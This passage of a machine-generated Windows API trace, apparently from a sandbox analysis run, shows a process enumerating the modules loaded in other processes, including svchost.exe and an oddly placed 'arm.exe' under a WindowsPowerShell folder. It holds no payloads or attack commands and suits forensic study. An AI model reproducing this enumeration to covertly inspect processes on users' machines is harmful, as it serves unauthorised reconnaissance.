cb=0x18 | out: lpmodinfo=0x259a2d0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0055.467] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0055.468] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0055.469] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x259c490, cb=0x18 | out: lpmodinfo=0x259c490*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0055.470] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0055.471] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0055.471] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x259e660, cb=0x18 | out: lpmodinfo=0x259e660*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0055.472] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0055.473] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0055.474] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd780000, lpmodinfo=0x25a0820, cb=0x18 | out: lpmodinfo=0x25a0820*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0055.475] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0055.477] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0055.478] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd760000, lpmodinfo=0x25a29e0, cb=0x18 | out: lpmodinfo=0x25a29e0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0055.479] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0055.480] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0055.481] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb310000, lpmodinfo=0x25a4ce0, cb=0x18 | out: lpmodinfo=0x25a4ce0*(lpBaseOfDll=0x7fefb310000, SizeOfImage=0xa000, EntryPoint=0x7fefb3144d0)) returned 1 [0055.482] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb310000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="UXINIT.dll") returned 0xa [0055.483] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb310000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UXINIT.dll" (normalized: "c:\\windows\\system32\\uxinit.dll")) returned 0x1e [0055.484] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc0d0000, lpmodinfo=0x25a6ea0, cb=0x18 | out: lpmodinfo=0x25a6ea0*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0055.485] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc0d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0055.486] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc0d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0055.487] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd070000, lpmodinfo=0x25a9060, cb=0x18 | out: lpmodinfo=0x25a9060*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0055.489] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0055.490] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0055.491] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcd70000, lpmodinfo=0x25ab220, cb=0x18 | out: lpmodinfo=0x25ab220*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0055.492] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0055.494] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0055.495] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x25ad3e0, cb=0x18 | out: lpmodinfo=0x25ad3e0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0055.496] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0055.497] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0055.499] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbb30000, lpmodinfo=0x25af5b0, cb=0x18 | out: lpmodinfo=0x25af5b0*(lpBaseOfDll=0x7fefbb30000, SizeOfImage=0x12a000, EntryPoint=0x7fefbb33810)) returned 1 [0055.500] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbb30000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WindowsCodecs.dll") returned 0x11 [0055.501] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbb30000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")) returned 0x25 [0055.502] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x25b1790, cb=0x18 | out: lpmodinfo=0x25b1790*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0055.504] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0055.505] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0055.507] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb9a0000, lpmodinfo=0x25b3950, cb=0x18 | out: lpmodinfo=0x25b3950*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0055.508] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb9a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0055.510] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb9a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0055.511] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd180000, lpmodinfo=0x25b5b10, cb=0x18 | out: lpmodinfo=0x25b5b10*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0055.512] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd180000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0055.514] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd180000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0055.515] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb9c0000, lpmodinfo=0x25b7cd0, cb=0x18 | out: lpmodinfo=0x25b7cd0*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0055.517] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0055.518] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0055.520] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd640000, lpmodinfo=0x25b9ea0, cb=0x18 | out: lpmodinfo=0x25b9ea0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0055.521] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0055.523] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0055.525] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb320000, lpmodinfo=0x25bc060, cb=0x18 | out: lpmodinfo=0x25bc060*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0055.526] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb320000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0055.528] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb320000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0055.529] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb160000, lpmodinfo=0x25be210, cb=0x18 | out: lpmodinfo=0x25be210*(lpBaseOfDll=0x7fefb160000, SizeOfImage=0x18000, EntryPoint=0x7fefb161010)) returned 1 [0055.531] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb160000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MPR.dll") returned 0x7 [0055.533] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb160000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MPR.dll" (normalized: "c:\\windows\\system32\\mpr.dll")) returned 0x1b [0055.534] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb150000, lpmodinfo=0x25c03c0, cb=0x18 | out: lpmodinfo=0x25c03c0*(lpBaseOfDll=0x7fefb150000, SizeOfImage=0xa000, EntryPoint=0x7fefb151198)) returned 1 [0055.536] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb150000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="drprov.dll") returned 0xa [0055.538] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb150000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll")) returned 0x1e [0055.540] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb120000, lpmodinfo=0x25c2580, cb=0x18 | out: lpmodinfo=0x25c2580*(lpBaseOfDll=0x7fefb120000, SizeOfImage=0x22000, EntryPoint=0x7fefb121198)) returned 1 [0055.542] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb120000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntlanman.dll") returned 0xc [0055.543] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb120000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll")) returned 0x20 [0055.545] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb100000, lpmodinfo=0x25c4750, cb=0x18 | out: lpmodinfo=0x25c4750*(lpBaseOfDll=0x7fefb100000, SizeOfImage=0x1c000, EntryPoint=0x7fefb101198)) returned 1 [0055.547] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="davclnt.dll") returned 0xb [0055.549] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")) returned 0x1f [0055.551] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb0f0000, lpmodinfo=0x25c6b28, cb=0x18 | out: lpmodinfo=0x25c6b28*(lpBaseOfDll=0x7fefb0f0000, SizeOfImage=0xa000, EntryPoint=0x7fefb0f4938)) returned 1 [0055.552] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb0f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DAVHLPR.dll") returned 0xb [0055.555] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb0f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DAVHLPR.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")) returned 0x1f [0055.557] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb0e0000, lpmodinfo=0x25c8d00, cb=0x18 | out: lpmodinfo=0x25c8d00*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0055.558] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb0e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="cscapi.dll") returned 0xa [0055.561] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb0e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0055.563] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x21c [0055.563] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25cbdf8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25cbdf8, lpcbNeeded=0x41eb20) returned 1 [0055.564] GetModuleInformation (in: hProcess=0x21c, hModule=0xcf0000, lpmodinfo=0x25cc068, cb=0x18 | out: lpmodinfo=0x25cc068*(lpBaseOfDll=0xcf0000, SizeOfImage=0x17000, EntryPoint=0xcf14a1)) returned 1 [0055.564] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xcf0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="arm.exe") returned 0x7 [0055.564] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xcf0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\WindowsPowerShell\\arm.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\arm.exe")) returned 0x30 [0055.564] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25ce280, cb=0x18 | out: lpmodinfo=0x25ce280*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.565] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.565] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.565] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x25d0440, cb=0x18 | out: lpmodinfo=0x25d0440*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.566] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.566] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.566] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x25d2600, cb=0x18 | out: lpmodinfo=0x25d2600*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.567] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.567] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.568] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25d47d0, cb=0x18 | out: lpmodinfo=0x25d47d0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.568] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.569] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.569] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x21c [0055.569] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25d6ef8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25d6ef8, lpcbNeeded=0x41eb20) returned 1 [0055.573] GetModuleInformation (in: hProcess=0x21c, hModule=0xff760000, lpmodinfo=0x25d7168, cb=0x18 | out: lpmodinfo=0x25d7168*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0055.573] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0055.573] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0055.574] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25d9360, cb=0x18 | out: lpmodinfo=0x25d9360*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.574] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.574] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.574] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x25db520, cb=0x18 | out: lpmodinfo=0x25db520*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0055.575] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0055.575] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0055.576] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x25dd6f0, cb=0x18 | out: lpmodinfo=0x25dd6f0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0055.576] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0055.576] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0055.577] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x25df8c0, cb=0x18 | out: lpmodinfo=0x25df8c0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0055.577] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0055.578] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0055.578] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x25e1ad8, cb=0x18 | out: lpmodinfo=0x25e1ad8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0055.579] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0055.579] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0055.580] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x25e3c98, cb=0x18 | out: lpmodinfo=0x25e3c98*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0055.580] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0055.581] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0055.582] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb80000, lpmodinfo=0x25e5e58, cb=0x18 | out: lpmodinfo=0x25e5e58*(lpBaseOfDll=0x7fefcb80000, SizeOfImage=0x67000, EntryPoint=0x7fefcb8d320)) returned 1 [0055.582] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="umpnpmgr.dll") returned 0xc [0055.583] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll")) returned 0x20 [0055.584] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb60000, lpmodinfo=0x25e8028, cb=0x18 | out: lpmodinfo=0x25e8028*(lpBaseOfDll=0x7fefcb60000, SizeOfImage=0x1f000, EntryPoint=0x7fefcb65c68)) returned 1 [0055.584] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SPINF.dll") returned 0x9 [0055.585] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\SPINF.dll" (normalized: "c:\\windows\\system32\\spinf.dll")) returned 0x1d [0055.586] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x25ea280, cb=0x18 | out: lpmodinfo=0x25ea280*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0055.587] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0055.588] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0055.589] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x25ec440, cb=0x18 | out: lpmodinfo=0x25ec440*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0055.589] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0055.590] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0055.591] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x25ee600, cb=0x18 | out: lpmodinfo=0x25ee600*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0055.592] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0055.593] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0055.594] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x25f07b0, cb=0x18 | out: lpmodinfo=0x25f07b0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0055.594] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0055.595] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0055.596] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb40000, lpmodinfo=0x25f2970, cb=0x18 | out: lpmodinfo=0x25f2970*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0055.597] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb40000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DEVRTL.dll") returned 0xa [0055.598] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb40000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\DEVRTL.dll" (normalized: 